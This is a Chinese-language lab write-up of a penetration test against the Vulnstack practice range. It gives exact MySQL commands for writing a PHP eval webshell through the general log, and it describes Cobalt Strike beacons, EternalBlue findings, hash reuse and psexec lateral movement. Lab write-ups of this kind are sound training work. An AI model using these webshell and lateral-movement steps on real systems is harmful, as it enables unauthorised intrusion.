background

新电脑配置的差不多了 也不知干什么 然后就是想学习一下常见Java类漏洞的打法 结果docker现在这种情况 真的是无语死了

然后就学学内网吧 搭建参考

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

打点

我也尽量黑盒自己去做 不看wp 靶机配置没做什么说明 那就直接三个全开 对着本机c段扫 发现貌似不行 这三个都是默认nat的

参考https://blog.csdn.net/m0_75178803/article/details/136015522 win7双网卡 通本机 win2008,win2k3都接在1交换机上

fscan是真的动不了

image-20241001163647181

goby发现了存活扫不动 后来另一篇文章说要进win7手启phpstudy

image-20241001164050506

登录的时候如果要修改密码 删了虚拟机镜像重新解压再启动 启动不了就重启 要是没网络就新增一个网卡 反正这玩意玄乎的很

image-20241001165327757

启动之后fscan就能扫到了 这里也禁ping了

image-20241001165547967

访问80端口是一个小皮的页面 测了下mysql是root root

image-20241001165730704

开了3306但是上不去

image-20241001165918773

扫了下路径发现有货

image-20241001165940319

直接写马不行

image-20241001170432551

尝试日志写入 查看日志情况

show variables like '%general%';

开启日志

set global general_log = on

改变日志位置 在测试页面中我们已经知道了绝对路径

set global general_log_file = 'C:/phpStudy/WWW/123.php';

写马

select '<?php  @eval($_POST[1]);?>';

getshell

image-20241001171153505

直接就是管理员权限了

image-20241001171254530

这里上线cs半天搞不好 后面发现是https监听器的问题 改成http就上了

image-20241001173740137

横向打点

这里拿到hash了 密码复用能全秒了 但这里是靶场 不能这样取巧

image-20241001175627042

那就挨个段摸吧

我的到这里又出问题了 52段不通 后面一直换交换机 搞好了

image-20241001192304142

141和138有永恒之蓝

image-20241001192751058

psexec

这里可以使用psexec来进行横向 前提是密码或者hash啥的都一样 这里内网的机器不出网 所以需要在入口机做一个smb监听器

image-20241002143131444

然后在视图->目标列表

{2E7D9F1A-A084-4298-91A5-82C280911CBC}

可以看到内网的其他机器

image-20241002145628720

除了这样

net view
arp -a

都能直观的看到内网主机的信息

直接选择psexec横向移动